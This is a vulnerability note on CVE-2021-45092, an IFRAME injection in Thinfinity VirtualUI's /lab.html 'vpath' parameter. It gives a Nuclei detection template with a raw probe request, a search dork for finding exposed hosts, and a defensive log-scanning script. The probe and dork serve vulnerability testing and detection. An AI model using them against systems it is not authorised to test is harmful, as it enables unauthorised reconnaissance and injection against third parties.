CVE-2021-45092: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exists in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
```yaml
id: CVE-2021-45092

info:
  name: Iframe functionallity
  author: danielmofer
  severity: medium
  description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
  reference:
    - https://github.com/cybelesoft/virtualui/issues/2
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44848
    - https://www.tenable.com/cve/CVE-2021-45092
  tags: cve,cve2021,misconfiguration

requests:
  - raw:
      - |
        GET /lab.html?vpath=//wikipedia.com HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - ".*vpath.*"
        part: body
```
Template Information:
CVE-2021-45092: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exists in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
Reference
Nuclei Template:
Example of the response:
To test it you can use the Google Dork: insite:"Thinfinity VirtualUI"
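A defender-side check for the request this template sends, as an added example that is not part of the original issue or of the nuclei-templates project: it scans web access logs for `/lab.html` requests whose `vpath` value points off-origin. The log lines, the log format, and the function names are constructed for illustration, and it assumes legitimate `vpath` values are same-origin relative paths.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines; addresses, hosts and paths are sample values.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2022:10:00:01 +0000] "GET /lab.html?vpath=/app/calc HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2022:10:00:05 +0000] "GET /lab.html?vpath=//wikipedia.com HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2022:10:00:09 +0000] "GET /lab.html?vpath=https%3A%2F%2Fexample.org%2Fx HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2022:10:00:12 +0000] "GET /lab.html?vpath=%5C%5Cexample.org HTTP/1.1" 200 512
198.51.100.2 - - [10/Jan/2022:10:00:20 +0000] "GET /index.html?vpath=//example.org HTTP/1.1" 200 100
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def vpath_is_external(value):
    """True when a vpath value would resolve to another origin in a browser."""
    # Decode once more to catch double-encoded values; browsers treat '\' like '/'.
    v = unquote(value).strip().replace("\\", "/")
    if v.startswith("//"):  # protocol-relative URL, as in the template's probe
        return True
    return bool(urlsplit(v).scheme)  # absolute URL with any scheme


def suspicious_requests(log_text, path="/lab.html"):
    """Return (client_ip, vpath) for requests to `path` carrying an external vpath."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != path:
            continue
        for value in parse_qs(url.query).get("vpath", []):
            if vpath_is_external(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, vpath in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} requested /lab.html with external vpath {vpath!r}")
```

The same `vpath_is_external` predicate can back a reverse-proxy or WAF rule that rejects such requests before they reach the application.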